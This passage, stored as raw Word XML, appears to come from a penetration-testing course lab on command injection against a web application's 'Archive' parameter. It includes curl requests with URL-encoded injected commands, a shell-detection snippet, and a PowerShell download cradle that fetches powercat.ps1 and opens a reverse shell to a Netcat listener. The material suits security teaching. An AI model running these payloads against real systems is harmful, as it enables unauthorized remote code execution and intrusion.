          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ipconfig</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> commands with a URL-encoded semicolon represented as "%3B". Semicolons can be used in a majority of command lines, such as PowerShell or Bash as a delimiter for multiple commands. Alternatively, we can use two ampersands, "&amp;&amp;", to specify two consecutive commands. For the Windows command line</w:t>
      </w:r>
      <w:hyperlink r:id="rId312">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId313">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">(CMD)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we can also use one ampersand.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E19">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">kali@kali:~$ curl -X POST --data 'Archive=git%3Bipconfig' http://192.168.50.189:8000/archive</w:t>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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E1C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">'git help -a' and 'git help -g' list available subcommands and some</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E1D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">concept guides. See 'git help &lt;command&gt;' or 'git help &lt;concept&gt;'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E1E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to read about a specific subcommand or concept.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E1F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">See 'git help git' for an overview of the system.</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pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows IP Configuration</w:t>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t xml:space="preserve">Ethernet adapter Ethernet0 2:</w:t>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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">   Connection-specific DNS Suffix  . : </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E27">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">   IPv4 Address. . . . . . . . . . . : 192.168.50.189</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E28">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">   Subnet Mask . . . . . . . . . . . : 255.255.255.0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E29">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">   Default Gateway . . . . . . . . . : 192.168.50.254</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spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="600" w:right="600" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 42 - Entering git and ipconfig with encoded semicolon</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E2C">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The output shows that both commands were executed. We can assume that there is a filter in place checking if "git" is executed or perhaps contained in the "Archive" parameter. Next, let's find out more about how our injected commands are executed. We will first determine if our commands are executed by PowerShell or CMD. In a situation like this, we can use a handy snippet, published by</w:t>
      </w:r>
      <w:hyperlink r:id="rId314">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId315">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">PetSerAl</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> that displays "CMD" or "PowerShell" depending on where it is executed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E2D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(dir 2&gt;&amp;1 *`|echo CMD);&amp;&lt;# rem #&gt;echo PowerShell</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spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="600" w:right="600" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 43 - Code Snippet to check where our code is executed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E30">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We'll use URL encoding once again to send it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E31">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">kali@kali:~$ curl -X POST --data 'Archive=git%3B(dir%202%3E%261%20*%60%7Cecho%20CMD)%3B%26%3C%23%20rem%20%23%3Eecho%20PowerShell' http://192.168.50.189:8000/archive</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t xml:space="preserve">...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E34">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">See 'git help git' for an overview of the system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E35">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PowerShell</w:t>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spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="600" w:right="600" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 44 - Determining where the injected commands are executed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E38">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The output contains "PowerShell", meaning that our injected commands are executed in a PowerShell environment.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E39">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Next, let's try to leverage command injection to achieve system access. We will use</w:t>
      </w:r>
      <w:hyperlink r:id="rId316">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId317">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Powercat</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to create a reverse shell. Powercat is a PowerShell implementation of Netcat included in Kali. Let's start a new terminal, copy Powercat to the home directory for the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">kali</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> user, and start a Python3 web server in the same directory.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E3A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">kali@kali:~$ cp /usr/share/powershell-empire/empire/server/data/module_source/management/powercat.ps1 .</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E3B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E3C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">kali@kali:~$ python3 -m http.server 80</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E3D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E3E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E3F">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="600" w:right="600" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 45 - Serve Powercat via Python3 web server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E40">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Next, we'll start a third terminal tab to create a Netcat listener on port 4444 to catch the reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E41">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">kali@kali:~$ nc -nvlp 4444</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E42">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">listening on [any] 4444 ...</w:t>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spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="600" w:right="600" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 46 - Starting Netcat listener on port 4444</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E46">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">With our web server serving </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">powercat.ps1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and Netcat listener in place, we can now use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the first terminal to inject the following command. It consists of two parts delimited by a semicolon. The first part uses a PowerShell download cradle to load the Powercat function contained in the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">powercat.ps1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> script from our web server. The second command uses the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">powercat</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> function to create the reverse shell with the following parameters: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-c</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to specify where to connect, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-p</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> for the port, and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-e</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> for executing a program.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E47">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IEX (New-Object System.Net.Webclient).DownloadString("http://192.168.119.3/powercat.ps1");powercat -c 192.168.119.3 -p 4444 -e powershell </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E48">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E49">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="600" w:right="600" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 47 - Command to download PowerCat and execute a reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E4A">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Again, we'll use URL encoding for the command and send it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E4B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">kali@kali:~$ curl -X POST --data 'Archive=git%3BIEX%20(New-Object%20System.Net.Webclient).DownloadString(%22http%3A%2F%2F192.168.119.3%2Fpowercat.ps1%22)%3Bpowercat%20-c%20192.168.119.3%20-p%204444%20-e%20powershell' http://192.168.50.189:8000/archive</w:t>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spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="600" w:right="600" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 48 - Downloading Powercat and creating a reverse shell via Command Injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E4E">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">After entering the command, the second terminal should show that we received a GET request for the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">powercat.ps1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E4F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">kali@kali:~$ python3 -m http.server 80</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E50">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E51">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.50.189 - - [05/Apr/2022 09:05:48] "GET /powercat.ps1 HTTP/1.1" 200 -</w:t>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r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E54">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="600" w:right="600" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 49 - Python3 web server shows GET request for powercat.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E55">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We'll also find an incoming reverse shell connection in the third terminal for our active Netcat listener.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E56">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">kali@kali:~$ nc -nvlp 4444</w:t>
      </w:r>
    </w:p>
